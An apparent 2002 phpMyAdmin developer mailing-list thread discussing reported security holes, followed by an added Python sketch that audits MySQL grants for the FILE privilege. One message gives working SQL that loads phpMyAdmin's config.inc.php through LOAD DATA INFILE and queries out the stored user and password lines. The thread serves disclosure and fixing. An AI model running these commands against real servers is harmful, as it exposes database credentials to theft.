On Mon, 12 Aug 2002, Marc Delisle wrote:
I've just merged a fix against that, but it needs some testing since I do not have a machine here which is affected by this security hole.
You won't like me, but I think we should wait to include a fix for a "hole" until a developer can reproduce it.
I'm going to set up a copy of PMA that exhibits the security hole for us to test out bug. Give me a day or two, as I have some more pressing work at the moment.
Robin,
the "goto" problem?
Marc
I've checked out the goto problem, and you were right, it is fixed in the recent releases. It now limits you to files only in the phpMyAdmin install directory. Which can still be a problem in itself I think.
On checking out the other problem with systems totally open using the config mechanism, try out this series of SQL Commands:
First time around:

    CREATE TABLE testB ( t mediumtext );
    LOAD DATA INFILE '/home/robbat2/public_html/PMA/config.inc.php'
        INTO TABLE testB
        FIELDS TERMINATED BY '\n' LINES TERMINATED BY '\n';

Where you need to change the path of the file, and the 'TERMINATED BY' parts for your own systems.
When that completes, I ran this:

    SELECT * FROM testB
    WHERE t like '%Server%' AND (t like '%user%' or t like '%password%');

To get just the PMA authentication data.
Of course, this exploit requires that the user have the FILE privilege. This would apply to all cases where PMA has been set up with the user as root, or anybody else with the FILE privilege.
I'm carrying on looking for more holes along these lines.
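
Added example, not part of the original thread: since the read described above depends on the FILE privilege, this sketch audits `SHOW GRANTS` output for accounts that hold it globally, either explicitly or through ALL PRIVILEGES ON *.*. The account names and grant lines are constructed sample data, and the function names are hypothetical.

```python
import re

# One line of SHOW GRANTS output: GRANT <privs> ON <scope> TO '<user>'@'<host>' ...
GRANT_RE = re.compile(
    r"^GRANT\s+(?P<privs>.+?)\s+ON\s+(?P<scope>\S+)\s+TO\s+"
    r"(?P<account>'[^']*'@'[^']*')",
    re.IGNORECASE,
)

# Constructed sample input (not taken from any real server).
SAMPLE_GRANTS = [
    "GRANT ALL PRIVILEGES ON *.* TO 'root'@'localhost' WITH GRANT OPTION",
    "GRANT SELECT, INSERT, FILE ON *.* TO 'pma'@'localhost'",
    "GRANT USAGE ON *.* TO 'webapp'@'%'",
    "GRANT ALL PRIVILEGES ON `shop`.* TO 'webapp'@'%'",
    "GRANT SELECT, UPDATE (name, email) ON `shop`.`users` TO 'report'@'10.0.0.5'",
]


def split_privileges(privs):
    """Return the set of privilege names, dropping column lists like (a, b)."""
    no_columns = re.sub(r"\([^)]*\)", "", privs)
    return {p.strip().upper() for p in no_columns.split(",") if p.strip()}


def accounts_with_file(grant_lines):
    """List accounts able to use LOAD DATA INFILE / SELECT ... INTO OUTFILE."""
    flagged = []
    for line in grant_lines:
        m = GRANT_RE.match(line.strip())
        if not m:
            continue
        # FILE is a global privilege: it only exists on the *.* scope, so
        # ALL PRIVILEGES on a single database does not include it.
        if m.group("scope") != "*.*":
            continue
        privs = split_privileges(m.group("privs"))
        if privs & {"FILE", "ALL", "ALL PRIVILEGES"}:
            if m.group("account") not in flagged:
                flagged.append(m.group("account"))
    return flagged


if __name__ == "__main__":
    for account in accounts_with_file(SAMPLE_GRANTS):
        print("holds FILE:", account)
```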